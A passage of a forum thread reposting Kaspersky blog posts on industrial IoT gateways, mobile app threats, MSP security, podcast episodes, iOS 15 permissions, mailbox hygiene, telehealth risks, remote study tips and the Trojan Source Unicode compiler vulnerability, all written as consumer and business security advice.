    One more example: the St. Petersburg company LenPoligraphMash connected its industrial equipment to 1C ERP system, and now – almost in real time – it shows in an ERP analytics on the performance of all operators, so it can pay them based on actual (not normative or averaged) down time. The uniqueness of this approach and its scalability was confirmed by experts of the respected analytical agency Arc Advisory Group in its first cyberimmunity report.

    immunizing-factories-ksig-100-2-EN.jpg

    So, as you can see, this isn’t just any old box. It’s a perfectly ingenious magical one! Already, besides its being in full combat duty at Chelpipe Group, KISG 100 is supplied together with the metals processing machinery of StankoMashKomplex, successful pilot projects are up and running with Rostec and Gazprom Neft, and dozens of other pilots with large industrial organizations have begun. The device received a special award for outstanding tech achievement at the largest Chinese IT event, Internet World Conference; at the Hannover Messe 2021 industrial exhibition KISG 100 earned a place among the best innovational solutions; and just recently it took the top prize in the IoT Awards 2021 of the Internet of Things Association, beating many top-rated companies.

    In the future we’ll be expanding the range of such smart boxes. Already, KISG 100‘s ‘older brother’ – KISG 1000 – is being beta tested. In addition to being a gateway-guard, it is also an inspector: it not only collects, checks and distributes telemetry, it also transfers management commands to devices and protects against network attacks.

    Kaspersky IoT Secure Gateway 1000

    The takeaway: you needn’t be afraid of digital; you simply need to be able to cook it properly! And we’re here to help with that – with the best chefs and recipes.

    View the full article

  11. Mobile apps that handle confidential user information should run in a trusted environment — and we’re talking about more than just banking apps. Aside from money, cybercriminals also seek out loyalty program points, discount cards, cryptocurrency wallets, and more.

    The creators of such apps can never know how protected a user’s device is or how prepared any users are for cyberthreats. Instead of simply hoping your customers use mobile security solutions, you can proactively equip your development with additional user-protection technologies. Here are our top 5 reasons to do so.

    1. Malicious software

    An ever-present threat, malware may come from whatever source the user uses to install apps on their phone or tablet. Even using official app stores is no guarantee of safety.

    Attackers have become especially inventive in recent years, and modern spyware includes a range of advanced features. Depending on the variety, malware can intercept app notifications, text messages, PIN codes, and screen-lock patterns; steal 2FA codes for Google Authenticator and the like; and share what is happening on the victim’s screen in real time.

    Malware capable of overlaying app windows with its own warrants a separate mention. Such programs can, for example, copy the interface of your solution and add fake login fields for stealing credentials.

    2. Unknown Wi-Fi networks

    You cannot know which networks app users will connect to. Just about every café and mode of transportation now offers its own Wi-Fi network to all and sundry, and anyone on the same network can try to intercept the data exchange between your app and the server, thus gaining access to the customer’s account. In some cases, cybercriminals set up their own wireless networks and deliberately leave them open to lure in users.

    3. Remote access tools

    An entire class of programs exists for the purpose of gaining complete control over users’ devices. RATs, or Remote Access Tools, are not necessarily malware (although some are) and may be included with legitimate apps. The access they provide can give cybercriminals remote access to the device, however, including the ability to change security settings, read any information on a device, and even use any app — including yours.

    4. Browser vulnerabilities

    In many cases, mobile apps are based on elements of a regular Web browser, plus or minus various functions. With browser engine vulnerabilities found regularly, mobile app developers periodically need to update their solutions. In the space between a vulnerability’s discovery and its fix, however, cybercriminals can try to attack through browser vulnerabilities in your app.

    5. Phishing

    Cybercriminals include phishers, who send links to malicious sites by e-mail, messaging apps, and text messages. Of course, attackers can try to copy the website of any company, but if they happen to target your users, luring them to a website that looks like yours or sending messages that appear to come from your company, yours is the reputation that can get stained.

    Why user protection is in your interest — and how to ensure it

    Formally, the threats we’ve listed hurt end users, not the companies that provide apps — at least, directly. Dig just a bit deeper and application operator losses become very clear. After all, the more cyberincidents, the greater the load on technical support; and in complicated scenarios, cases can end up in court, where even if you are not guilty or culpable, defending yourself will nonetheless require significant amounts of money. In addition, even if you prove your case, you are likely to lose a client, or worse: In this age of social media, news of even one incident can spread quickly and cause serious damage to a company’s reputation. Playing it safe and ensuring protection of your customers in advance makes good sense.

    Our arsenal includes Kaspersky Mobile Security SDK, for adding security features to any mobile app, an antivirus engine, and technologies with access to Kaspersky cloud services for real-time information about the reputation of files, Web pages, and public Wi-Fi networks. You can learn more about Kaspersky Mobile Security SDK on the solution's dedicated page.

    View the full article

  12. For the vast majority of companies, the global COVID-19 pandemic has caused dramatic changes in working processes. But few sectors were affected quite as much as the MSP market. Businesses of all sizes faced the need to implement new solutions and services. Moreover, they needed to implement them quickly — often doing so without the necessary resources or expertise. Therefore, even those who previously preferred to rely solely on internal staff, were forced to consider employing external assistance — that’s where managed service providers (MSPs) came in.

    MSP and MSSP market growth

    All this activity has led to an increase in demand and, as a result, growth to the MSP market. Security services were especially in demand, because at the very beginning of the pandemic, after the outbreak of remote services related cyberattacks, it became obvious that to protect the new distributed corporate infrastructure, companies needed to implement new security mechanisms in order to keep their networks secure.

    According to our MSP market focus in 2021 research, 81% of MSP report an increase in their customer base compared to 2019. Among MSSP, this figure is even higher — 91%. The same trend is noted by Canalys analysts. According to their forecasts, the results of 2021 show continued growth of the MSP market — in Europe alone, they expect an increase in market volume from $79 billion in 2020 to $92 billion in 2021.

    Expanding cybersecurity services portfolio

    More and more MSPs are expanding their portfolio with security services. Interestingly, the reason for this isn’t due only to an increase of demand from their clients, but also due to the development of MSPs’ internal expertise in the security field.

    Worryingly, the growing role of MSPs was noticed not only by market analysts, but also by cybercriminals. Now criminals are increasingly targeting MSPs which allows them to implement supply chain attack scenario‘s — by compromising the provider’s infrastructure, criminals are able to gain access to the MSPs clients, thus increasing their potential revenue.

    The most vivid example of such an attack is SolarWinds. In our MSP market focus in 2021 report we dedicated a whole section to the learnings of this incident. According to Canalys research, attacks on MSPs forced almost two-thirds of market participants to revise their security processes and technologies they invested in. By and large, companies now need to become their own MSSP in order to efficiently and securely deliver services to their clients.

    Canalys analysts also proposed ten steps an MSP needs for more secure practices. Five steps relate to necessary process changes, whilst the other five require certain technological changes. Analysts believe that from a process perspective, providers need to:

    1. Prioritize the security elements of a portfolio
    2. Assume they are already under attack
    3. Stay up to date with the latest patches
    4. Proactive training for employees and customers
    5. Audit all internal tools and service level agreements

    From a technological point of view, Canalys experts advise:

    1. Enforce MFA for all remote logins
    2. Always use secure network and system infrastructure
    3. Restrict admin access during remote logins
    4. Create least privilege access for resources
    5. Upgrade networking tools for hybrid working

    For the report on the results of the MSP market focus in 2021 study, please visit a page on our blog. The two parts of the Canalys report, “Building managed services for security” and “Being a ‘trusted advisor'”, are available here.

    View the full article

  13. Welcome to episode 230 of the Transatlantic Cable podcast. Ahmed and Jeff are unable to attend the taping this week because of travel commitments. Filling in is the ever-dependable Jag.

    To start, we look at an interesting story from down under, where an impending government policy will force social media companies to unmask online trolls. From there, we move on to a story about facial recognition for goats in China (yes, really.)

    After that rather unusual bit of news, David chats with David Emm about the recent Kaspersky GReAT APT review. We then look at two stories from the BBC, the first of a cryptocurrency called JRR Token (no relation to JRR Tolkien, according to the creators), the second on proposed legislation in the UK to ban default passwords on smart devices. Smart thinking, I say.

    If you liked what you heard, please consider subscribing and sharing with your friends. For more information on the stories we covered, see the links below:

     

    button-subscribe-apple.pngbutton-subscribe-spotify.pngbutton-subscribe-google.pngbutton-subscribe-rss.png

     

    View the full article

  14. With each version of iOS, we’ve seen developers try to protect user data better. However, the core principle remains unchanged: You, the user, gets to decide what information to share with which apps. With that in mind, we’ve put together an in-depth review of app permissions in iOS 15 to help you decide which requests to allow and which to deny.

    Where to find iOS 15 app permission settings

    iOS 15 offers several ways to manage permissions. We’ll talk about each of the three methods separately.

    Managing permissions when you first launch an app

    Every app requests permission to access certain information the first time you launch it, and that’s the easiest time to choose what data to share with the app. But even if you accidentally press “Yes” instead of “No,” you can still change it later.

    Setting up all permissions for a specific app

    To see and set all permissions for a particular app at once, open the system settings and scroll down to see a list of installed applications. Select an app to see what permissions it has and revoke them if you need to.

    Setting specific permissions for different applications

    Go to Settings → Privacy. In this section, you will find a long list of basic iOS 15 permissions. Click on each permission to see which applications requested it. You can deny access to any of them at any time.

    Not all permissions are in the Privacy menu; you’ll need to go to other settings sections to configure some of them. For example, you can disable mobile data transfer for apps in the Mobile section, and permission to use the Internet in the background is configured in the Background App Refresh section.

    Now you know where to look for what. Next, we’ll go into more detail about all of iOS’s permissions.

    Location Services

    What it is: Permission to access your location. This permission isn’t just about GPS; apps can also navigate using mobile network base stations, Bluetooth, and the coordinates of Wi-Fi hotspots you are connected to. Access to location services is used, for example, by maps to plot routes and show you nearby businesses.

    What the risks are: Having location access enables apps to map your movements accurately. App developers can use that data for marketing purposes, and cybercriminals can use it to spy on you.

    You may not want to give this permission to an app if you don’t fully trust it or don’t think it needs that level of information. For example, social networks can do without location access if you don’t add geotags to your posts or if you prefer to do so manually.

    In case you need an app that needs location access to work properly, here are two ways to protect yourself from being tracked:

    • Allow access to location only while using the app to give the app access to your coordinates only when you are actually using it. If the app wants to receive location information in the background, you will be notified and may opt out.
    • Turn off Precise Location to restrict the app’s knowledge of your location. In this case, the margin of error will be about 25 square kilometers (or 10 square miles) — that’s comparable to the area of a small city.

    What’s more, iOS has long had an indicator that lets you know that an app is requesting access to your location. With iOS 15, that indicator has become much more prominent, appearing as a bright blue icon with a white arrow at the top of the screen.

    When an app is accessing your location, iOS 15 shows a bright blue icon with a white arrow inside

    Where to configure it: Settings → Privacy → Location Services

    Tracking

    What it is: Permission to access a unique device identifier — the Identifier for Advertisers, or IDFA. Of course, each individual application can track a user’s actions in its own “territory.” But access to IDFA allows data matching across apps to form a much more detailed “digital portrait” of the user.

    So, for example, if you allow tracking in all applications, then a social network can not only see all of your records and profile information in it, but also find out what games you play, what music you listen to, the weather in cities you are interested in, what movies you watch, and much more.

    What the risks are: Tracking activity in apps enables the compilation of a much more extensive dossier on the phone’s owner, which increases advertising efficacy. In other words, it can encourage you to spend more money.

    Starting in iOS 14.5, users gained the ability to disable tracking requests in apps.

    Where to configure it: Settings → Privacy → Tracking

    Contacts

    What it is: Permission to access your address book — to read and change existing contacts and to add new contacts. Data an app can get with this permission includes not only names, phone numbers, and e-mail addresses, but also other information from your list of contacts, including notes about specific contacts (although apps need separate approval from Apple to access the notes).

    What the risks are: Databases of contacts — with numbers, addresses, and other information — can, for example, be used to attack an organization, send spam, or conduct phone scams.

    Where to configure it: Settings → Privacy → Contacts

    Calendars

    What it is: Permission to view, change, and add calendar events.

    What the risks are: The app will receive all of your personal calendar information, including past and scheduled events. That may include doctor’s appointments, meeting topics, and other information you don’t want to share with outsiders.

    Where to configure it: Settings → Privacy → Calendars

    Reminders

    What it is: Permission to read and change existing reminders and add new ones.

    What the risks are: If you have something personal recorded in your Reminders app, such as health data or information about family members, you may not want to share it with any app developers.

    Where to configure it: Settings → Privacy → Reminders

    Photos

    What it is: This permission allows the app to view, add, and delete photos and videos in your phone’s gallery. The app also can read photo metadata, such as information about where and when a photo was taken. Apps that need access to Photos include image editors and social networks.

    What the risks are: A personal photo gallery can say a lot about a person, from who their friends are and what they’re interested in to where they go, and when. In general, even if you don’t have nude photos, pictures of both sides of your credit card or screenshots with passwords in the gallery, you should be cautious about giving apps access to yours.

    Starting with iOS 14, Apple developers added the ability to give an app access to individual files without giving them the entire gallery. For example, if you want to post something on Instagram, you can choose precisely which images to upload and keep your other photos invisible to the social network. In our opinion, that’s the best option for providing access to your images.

    Where to configure it: Settings → Privacy → Photos

    Local Network

    What it is: Permission to connect to other devices on your local network, for example, to play music with AirPlay, or to control your router or other gadgets.

    What the risks are: With this type of access, applications can collect information about all of the devices on your local network. Data about your equipment can help an attacker find vulnerabilities, hack your router, and more.

    Where to configure it: Settings → Privacy → Local Network

    Nearby Interaction

    What it is: Permission to use Ultra Wideband (UWB), which the iPhone 11 and later support. Using UWB lets you measure the exact distance between your iPhone and other devices that support the technology. In particular, it’s used in Apple AirTag to find things you’ve tagged.

    What the risks are: A malicious app with UWB access can determine your location extremely accurately, to an exact room in a house or even more precisely.

    Where to configure it: Settings → Privacy → Nearby Interaction

    Microphone

    What it is: Permission to access your microphone.

    What the risks are: With this permission, the app can record all conversations near the iPhone, such as in business meetings or at a medical appointment.

    An orange dot in the upper right corner of the screen indicates when an app is using a microphone (the dot becomes red when you turn on the Increase Contrast accessibility feature).

    When an app is using the microphone, iOS 15 shows an orange dot

    When an app is using the microphone, iOS 15 shows an orange dot

    Where to configure it: Settings → Privacy → Microphone

    Speech Recognition

    What it is: Permission to send voice-command recordings to Apple’s servers for recognition. An app needs this permission only if it uses Apple’s speech recognition service. If the app uses a third-party library for the same purpose, it will need another permission (Microphone) instead.

    What the risks are: By and large, asking for this permission is indicative of an app developer’s honest intentions — by using Apple’s proprietary speech recognition service, they are following the company’s rules and recommendations. A malicious app is much more likely to ask for direct access to the microphone. Nevertheless, use caution granting permission for speech recognition.

    Where to configure it: Settings → Privacy → Speech Recognition

    Camera

    What it is: Permission to take photos and videos, and to obtain metadata such as location and time.

    What the risks are: An application can connect to the phone’s cameras at any time, even without your knowledge, and obtain access to photos’ metadata (the time and location where they were taken). Attackers can use this permission to spy on you.

    If an application is currently accessing the camera, a green dot lights up in the upper right corner of the screen.

    When an app is using the camera, iOS 15 shows a green dot

    When an app is using the camera, iOS 15 shows a green dot

    Where to configure it: Settings → Privacy → Camera

    Health

    What it is: Permission to access data you keep in the Health app, such as height, weight, age, and disease symptoms.

    What the risks are: App developers may sell your health information to advertisers or insurance companies, which can tailor ads based on that data or use it to calculate health insurance rates.

    Where to configure it: Settings → Privacy → Health

    Research Sensor & Usage Data

    What it is: Access to data from the phone’s built-in sensors, such as the light sensor, accelerometer, and gyroscope. Judging by indirect references in this document, that could also include data from the microphone and facial recognition sensor, as well as from iWatch sensors. The permission can also provide access to data about keyboard usage, the number of messages sent, incoming and outgoing calls, categories of apps used, websites visited, and more.

    As you can see, this permission can provide a range of sensitive data about the device’s owner. Therefore, only apps designed for health and lifestyle research should request it.

    What the risks are: The permission can allow outsiders to obtain information about you that is not available to ordinary apps. In particular, this data allows examination of your walking pattern, the position of your head while you’re looking at the screen, and collecting a lot of information about how you use your device.

    Of course, you shouldn’t provide that much data about yourself to just anyone. Before agreeing to participate in a study and providing permission to the app in question, take a good look at what data the scientists are interested in, and how they plan to use it.

    Where to configure it: Settings → Privacy → Research Sensor & Usage Data

    HomeKit

    What it is: The ability to control smart home devices.

    What the risks are: With this level of access, an app can control smart home devices on your local network. For example, it can open smart door locks and blinds, turn music on and off, and control lights and security cameras. A random photo-filter app (for example) should not need this permission.

    Where to configure it: Settings → Privacy → HomeKit

    Media & Apple Music

    What it is: Permission to access your media library in Apple Music and iCloud. Apps will receive information about your playlists and personal recommendations, and they will be able to play, add, and delete tracks from your music library.

    What the risks are: If you don’t mind sharing your music preferences with the app, you probably have nothing to worry about, but be aware that this data may also be used for advertising purposes.

    Where to configure it: Settings → Privacy → Media & Apple Music

    Files and Folders

    What it is: Permission to access documents stored in the Files app.

    What the risks are: Apps can change, delete, even steal important documents stored in the Files app. If you’re using Files to store important data, keep access limited to the apps you truly trust.

    Where to configure it: Settings → Privacy → Files and Folders

    Motion & Fitness

    What it is: Permission to access data about your workouts and daily physical activity, such as number of steps taken, calories burned, and so on.

    What the risks are: Just like medical data from the Health app, activity data may be used by marketers to display targeted ads and by insurance companies to calculate health insurance costs.

    Where to configure it: Settings → Privacy → Motion & Fitness

    Focus

    What it is: This permission allows apps to see if notifications on your smartphone are currently muted or enabled.

    What the risks are: None.

    Where to configure it: Settings → Privacy → Focus

    Analytics & Improvements

    What it is: Permission to collect and send data to Apple about how you use your device. It includes, for example, information about the country you live in and the apps you run. Apple uses the information to improve the operating system.

    What the risks are: Your smartphone may use mobile data to send Apple data, potentially draining both the battery and your data plan a bit faster.

    Where to configure it: Settings → Privacy → Analytics & Improvements

    Apple Advertising

    What it is: Permission to collect personal information such as your name, address, age, gender, and more, and use it to show targeted ads from Apple’s ad service — but not to share it with other companies. Disabling this permission will not eliminate ads, but without data collection they will be generic, not targeted.

    What the risks are: As with any targeted ads, more effective advertising may lead to extra spending.

    Where to configure it: Settings → Privacy → Apple Advertising

    Record App Activity<

    What it is: Permission to keep track of what data (location, microphone, camera, etc.) any given application accessed. At the time of this writing (using iOS 15.1), users may download the collected data as a file, albeit not a very informative one. Future versions of iOS (starting with 15.2, expected at the end of 2021) will use this data for the App Privacy Report, which is a bit like Screen Time, but for app tracking.

    What’s useful: If you want to use the App Privacy Report as soon as iOS 15.2 becomes available, you may want to enable app activity logging in advance.

    Where to configure it: Settings → Privacy → Record App Activity

    Mobile Data

    What it is: Permission to use mobile Internet. Applications need access to the Web to send messages, load photos and news feeds, and complete technical tasks such as sending bug reports.

    What the risks are: Apps working in the background can quickly deplete data allowances. Users may prefer to deny mobile Internet access to apps that send a lot of data over the Web, instead limiting them to Wi-Fi use, especially when roaming. We strongly recommend users go through their app lists and disable unnecessary mobile data permissions before trips abroad.

    Where to configure it: Settings → Mobile

    Background App Refresh

    What it is: Permission to refresh content when you are not using an app, that is, when it’s running in the background.

    What the risks are: Updating content consumes data and battery power, but all modern smartphones are designed to run apps in the background. Take action only if you notice that a certain program is sending a lot of data over the Web and significantly reducing your smartphone’s runtime. You can check apps’ mobile data and power consumption in the system settings, under Mobile Data and Battery.

    Where to configure it: Settings → General → Background App Refresh

    Better safe than sorry

    Protecting yourself from apps that are too greedy in collecting your personal information takes very little time. We strongly recommend taking that time, though, carefully considering all requests and being judicious about what you share and with whom. Remember that you are responsible for your privacy, so you can rest easy after denying any requests that seem suspicious or unreasonable, knowing your photos, videos, documents, and other data are safe.

    View the full article

  15. If someone gets access to your mailbox, one possible consequence is a BEC attack, in which case your correspondence can contribute greatly to its success. Of course, security software helps adjust the odds in your favor, but anyone can fall for phishing, so it’s important to minimize potential damage by removing any messages you would not want to fall into someone else’s hands — just in case. Here is what to remove first.

    Authentication data

    Most modern services avoid sending even temporary passwords, instead providing unique links to a password-change interface. Sending passwords through unencrypted e-mail is a terrible idea, after all. But some companies do still send passwords by e-mail, and the practice is somewhat more common with internal services and resources. Moreover, employees sometimes send themselves passwords, logins, and their answers to secret questions.

    Such letters are exactly what attackers are looking for: With access to corporate resources, they can get extra information for social engineering manipulations and further develop attacks.

    Online service notifications

    We get all sorts of notifications from online services: registration confirmations, password reset links, privacy policy update notifications. The letters per se are of no interest to anybody, but they show what services you subscribe to. The attackers will most likely have scripts ready to automate their search for these notifications.

    In most cases your mailbox is the master key to all of these services. Knowing which ones you use, the attackers can request a password change and get in through your mailbox.

    Scans of personal documents

    Corporate users (particularly those in small business) are often tempted to use their mailboxes as a sort of cloud file storage, especially if the office scanner delivers scans by e-mail. Copies of passports, taxpayer IDs, and other documents are often required for routine paperwork or business trips.

    We recommend deleting any messages containing personal information immediately. Download the documents and keep them in encrypted storage.

    Sensitive business documents

    For many employees, document exchange is an integral part of business workflow. That said, some documents may be of value not only for your colleagues, but also for attackers.

    Take, for example, a financial report. Likely to be found in the accountant’s mailbox, a financial report provides a wealth of powerful information — and an ideal starting point for BEC attacks. Instead of sending scattershot scam letters to colleagues, for example, cybercriminals with such information can directly use real info about specific contractors, accounts, and transaction sums to craft appealing subject lines. They can also obtain useful information about the company’s business context, partners, and contractors so as to attack them as well. In some cases, careful study of a financial report may also present an opportunity for stock exchange manipulation.

    Therefore, it is important to delete sensitive information on receipt and never to exchange it unencrypted.

    Personal data

    Other people’s personal data, such as resumes and CVs, application and registration documents, and so forth, can find their way into your mailbox, too. When people give your company permission to store and process their personal data, they expect you to keep that information safe and secure. Regulators expect that as well, especially in countries with strict PII laws.

    How to secure yourself against a mailbox compromise

    We recommend deleting any information that may be of interest to attackers — not only from your inbox but also from your Sent and Deleted folders. If your business requires you to send commercially sensitive information by e-mail, use encryption, which most e-mail clients for business support.

    Additionally, we recommend using two-factor authentication wherever possible. If you do, then even if an attacker compromises your mailbox, your other accounts won’t end up in their hands.

    Store passwords and scanned documents in specialized applications such as our Password Manager.

    Practice prevention by keeping your mailbox secure, carefully screening your incoming mail at the mail server level and, as an additional layer of protection, using reliable security solutions on corporate computers.

    View the full article

  16. Welcome to the 229th episode of the Kaspersky Transatlantic Cable podcast. Ahmed, Dave and I start by looking into the world of NFTs.

    💀OMG WHO RIGHT CLICKED ALL OF THE #NFTs?☠️
    🛳🏴‍☠️ https://t.co/o0YRK78AkL 🏴‍☠️🛳
    👀 pic.twitter.com/g74TFqzX0n

    🏴‍☠️ thenftbay.org 👋🇵🇹 (@GeoffreyHuntley) November 18, 2021

    In this tale, it seems that a pirate site will allow users to download any NFT that has been bought and sold. Please tell me again, how a NFT site can be fooled by CTRL-Right Click? From there, we dive into the Metaverse, where Facebook is rolling out their clone of the Oasis.

    Now, while they say that the haptic gloves will help make digital handshakes and eliminate business travel, we all know what they are really about… data. For our third story, we discuss how a glitch at Tesla locked some folks out of their autos.

    After the Tesla snafu, we jump to an odd story in the US. While there is a lot of weird in the US going on at any given day, this story takes a look at a woman who tried to buy a hitman to kill her ex-husband. Fortunately for him, and unfortunately for her, she used a fake site that then shared her info with the authorities. Now, for a PSA, please check out the site, it is quite comical and anyone who would think that it is legitimate, you have to wonder a bit. We close out the pod looking at a warning from the FBI on potential ransomware attacks tied to the US-Thanksgiving holiday as well as some tips to stay safe online shopping.

    If you liked what you heard, please consider subscribing and sharing with your friends. For more information on the stories we covered, see the links below:

     

    button-subscribe-apple.pngbutton-subscribe-spotify.pngbutton-subscribe-google.pngbutton-subscribe-rss.png

     

    View the full article

  17. Telehealth promises many benefits: remote 24-hour monitoring of the patient’s vital signs; the ability to get expert opinions even in the most remote regions; and considerable savings of time and resources into the bargain. In theory, the modern level of technology makes all this possible right now. In practice, however, telehealth still faces certain difficulties.

    Our colleagues, assisted by Arlington Research, interviewed representatives of large medical companies around the globe about the application of telehealth practices. The questions probed their views on the development of this field and, above all, the difficulties that doctors face when providing medical services remotely. Here is what they found.

    Patient data leaks

    According to 30% of those surveyed, patient data at their clinics had been compromised as a result of telehealth sessions. In today’s climate of strictly regulated PII protection, leaks can cause serious problems for medical institutions in terms of both reputational damage and fines from regulators.
    не з
    How to fix it? Before adopting a new IT-based process, it makes sense to carry out an external audit to identify and remediate security and privacy flaws.

    Lack of data protection understanding

    42% of respondents admitted that medical employees taking part in telehealth sessions do not have a clear understanding of the data protection processes practiced in their clinic. This is undoubtedly bad. The doctor (a) might make a mistake that leads to a leak and (b) will be unable to answer (increasingly common) questions from the patient.

    How to fix it? First, the medical institution needs to produce a document that clearly spells out how data is stored and processed, and send it to all employees. Second, doctors should be more aware of modern cyberthreats. This will minimize the chance of error.

    Unsuitable software

    54% of respondents said their institutions provide telehealth services using software not designed for this purpose. Again, this can cause leaks simply due to the technical limitations of the software platforms used or unpatched vulnerabilities contained inside them.

    How to fix it? Wherever possible, use software designed specifically for medical purposes. Conduct a security audit of all applications used to provide remote services.

    Diagnostic errors due to technical limitations

    34% of organizations had experienced cases of misdiagnosis due to poor photo or video quality. This issue is partly a consequence of the previous one: video-conferencing software often automatically reduces image quality to ensure a seamless session. But problems can also arise due to congested servers or communication channels.

    How to fix it? Unfortunately, not everything here depends on the medical company — the root of the problem may lie in low-quality client-side equipment. All the same, the company should do all it can to minimize potential complications by providing backup capacity (if on-prem servers are used for teleconferencing) and a spare communication channel.

    Legacy operating systems

    73% of telehealth companies use equipment based on legacy operating systems. In some cases, this is for compatibility requirements, but it can also be due to upgrade costs or the simple lack of qualified IT staff. A vulnerable legacy system in the network can potentially serve as an entry point for attackers and be used both to steal patient data and to sabotage telehealth processes.

    How to fix it? It goes without saying that operating systems should be updated whenever possible. However, this is not always feasible, for example, when using outdated medical equipment. In this case, we recommend isolating vulnerable systems in a separate network segment offline, and fitting them with specialized security solutions operating in Default Deny mode.

    More details about the Telehealth Take-up: Risks and Opportunities report are available here.

    View the full article

  18. Remote work and distance learning have been part of our reality since the spring of 2020, and they seem to be here to stay. College students enrolled after 2019 missed a huge part of the experience. But along with the obvious shortcomings, distance learning offers benefits that are no less significant: more sleep, better diet, and the ability to mix work and study more efficiently. Here is how to leverage the pros of distance education while smoothing over the cons.

    1. Set clear boundaries

    The first thing everyone I know was excited about when school went remote was being able to work and study without getting out of bed. Among other things, early-morning classes became manageable. That illusion vaporized fairly quickly, though.

    The whole concept of learning without having to get out of bed proved a bit less amazing in practice than I’d expected. After a few weeks of taking advantage of the relaxed atmosphere, I found I’d erased the boundary between study and leisure, and I started waking up at night, thinking about an impending deadline.

    We all need the right environments for our various activities. For learning, I strongly recommend creating the space you need to focus, listen, converse, read, and work. If you’re going to be studying or working at home, draw a clear line between learning and leisure spaces and keep your activities in the appropriate areas.

    Keeping up customary rituals from the old normal can help as well: Get up on time, change into appropriate clothes, brush hair, have breakfast, and so on — essentially, do what you’d be doing if you were going to school in person.

    2. Sleep and eat

    In making the transition to online learning, it’s easy to go to one extreme or the other. My problem was overfocusing on studies, but examples of the opposite abound as well, with classes taking a back seat to social networks, TV shows, and mobile games. Strange as it may seem, the same set of tips can help with both.

    First, work on your sleep schedule. In traditional learning environments, we spend a lot of time traveling and packing, but likely not with remote learning. That newly available time might be better spent getting enough sleep.

    Another important step is evaluating and improving eating habits. For example, you may want to ensure you have breakfast, lunch, and dinner at the same time every day, or spend a bit more time preparing healthier meals. With distance learning, you can eat when you need to, not just when class schedules dictate, freeing you to spend less on meals and eat better at the same time.

    Neglecting leisure is not a good idea, either. Deadlines and home assignments will never end, but everyone needs room for friends, movies, and TV shows, and just plain recreation. Breaks help us learn more productively and gain fresh perspectives on old problems.

    3. Don’t forget to move

    Being active is absolutely essential to good health. If you have to spend most of your time sitting at home, try to find even 20 or 30 minutes to move around between or after classes. It will make a world of difference in the quality of your life.

    Consider an app, if that seems useful for you. Look for workout or other activity plans that are realistic but challenging, with a variety that appeals to you — with equipment or without; functional, cardiovascular, yoga, sports; slow, fast, intense, or gentle. Getting outdoors in between classes doesn’t hurt, either.

    4. Prepare for video calls

    Distance education has forced all students and educators into a new world of Zoom, Teams, Skype, Discord, and many other online communication tools. We probably should all have the hang of it by now, but well over a year into the pandemic, there’s still no end to the funny and embarrassing incidents.

    Thus, this past September, my whole class was keenly aware that a classmate’s friend hit his first million views on TikTok. Always check that your microphone is muted and your camera is off!

    5. Don’t put off lectures for later

    Teachers often record their online lectures and share the recordings, which makes skipping class tempting. I just can’t recommend that. Keep the option for when you really cannot attend, but strive to follow a schedule; it’ll help you stay organized and focused — and let’s be honest, how often do you actually watch those recordings?

    6. Set notifications and remember your passwords

    Speaking of things that do not belong on the back burner, it is especially important to put deadlines on your calendar, or else they can sneak up on you. Helpful tools include Google Calendar, Google Keep, Todoist, Tick-tick, and the good old paper calendar.

    Notifications can save you if you have forgotten about the deadline for submitting a course paper or an important home assignment. To keep messages from course chats and school calendars or e-mail alerts from getting buried under junk, configure your notifications properly. Here are a few how-to articles:

    Distance learning has made each of us create about a thousand accounts with various services, and remembering all of your passwords is no small feat. So, if you do not have a password manager yet, now's the time to start using one.

    7. Learn to manage background noise

    Humanity’s engineering achievements can help to address some of the challenges online learning presents. You can always ask those around you to keep it down, but keeping the peace may require technological solutions.

    Those apps can keep the people you talk with from hearing excessive noise, but what about your concentration? You have a few options for keeping your study space calm and quiet, not all of which involve actually shushing the neighbors.

    8. Upgrade your hardware

    Learning from home is more likely than not to require some equipment upgrades. If you have been delaying getting that powerful laptop or a second monitor, now may be the time.

    Cash-strapped students may not be able to buy expensive devices, and it may make sense to cover at least some of your needs with old gadgets. For example, an old tablet could become a second screen, and a smartphone makes a good webcam. Wi-Fi routers needs special attention as well; they’re sure to see extra work.

    Carpe diem!

    Distance learning may have prevented us from enjoying part of the traditional student experience, but it can also uncover a wealth of new possibilities — and don’t forget, the pandemic will be over one day, whereas the skills you develop during this time are yours for life.

    View the full article

  19. University of Cambridge experts described a vulnerability they say affects most modern compilers. A novel attack method uses a legitimate feature of development tools whereby the source code displays one thing but compiles something completely different. It happens through the magic of Unicode control characters.

    Unicode directionality formatting characters relevant to reordering attacks.

    Unicode directionality formatting characters relevant to reordering attacks. Source.

    Most of the time, control characters do not appear on the screen with the rest of the code (although some editors display them), but they modify the text in some way. This table contains the codes for the Unicode Bidirectional (bidi) Algorithm, for example.

    As you probably know, some human languages are written from left to right (e.g., English), others from right to left (e.g., Arabic). When code contains only one language, there’s no problem, but when necessary — when, for example, one line contains words in English and in Arabic — bidi codes specify text direction.

    In the authors’ work, they used such codes to, for example, move the comment terminator in Python code from the middle of a line to the end. They applied an RLI code to shift just a few characters, leaving the rest unaffected.

    Example of vulnerable Python code using bidi codes

    Example of vulnerable Python code using bidi codes. Source.

    On the right is the version programmers see when checking the source code; the left shows how the code will be executed. Most compilers ignore control characters. Anyone checking the code will think the fifth line is a harmless comment, although in fact, an early-return statement hidden inside will cause the program to skip the operation that debits bank account funds. In this example, in other words, the simulated banking program will dispense money but not reduce the account balance.

    Why is it dangerous?

    At first glance, the vulnerability seems too simple. Who would insert invisible characters, hoping to deceive source code auditors? Nevertheless, the problem was deemed serious enough to warrant a vulnerability identifier (CVE-2021-42574). Before publishing the paper, the authors notified the developers of the most common compilers, giving them time to prepare patches.

    The report outlines the basic attack capabilities. The two execution strategies are to hide a command within the comments, and to hide something in a line that, for example, appears on-screen. It is possible, in theory, to achieve the opposite effect: to create code that looks like a command but is in fact part of a comment and will not be run. Even more creative methods of exploiting this weakness are bound to exist.

    For example, someone could use the trick to carry out a sophisticated supply-chain attack whereby a contractor supplies a company with code that looks correct but doesn’t work as intended. Then, after the final product is released, an outside party can use the “alternative functionality” to attack customers.

    How dangerous is it, really?

    Shortly after the paper was published, programmer Russ Cox critiqued the Trojan Source attack. He was, to put it mildly, unimpressed. His arguments are as follows:

    • It is not a new attack at all;
    • Many code editors use syntax highlighting to show “invisible” code;
    • Patches for compilers are not necessary — carefully checking the code to detect any accidental or malicious bugs is sufficient.

    Indeed, the problem with Unicode control characters surfaced, for example, way back in 2017. Also, a similar problem with homoglyphs — characters that look the same but have different codes — is hardly new and can also serve to sneak extraneous code past manual checkers.

    However, Cox’s critical analysis does not deny the existence of the problem, but rather condemns reports as overdramatic — an apt characterization of, for example, journalist Brian Krebs’ apocalyptic ‘Trojan Source’ Bug Threatens the Security of All Code.

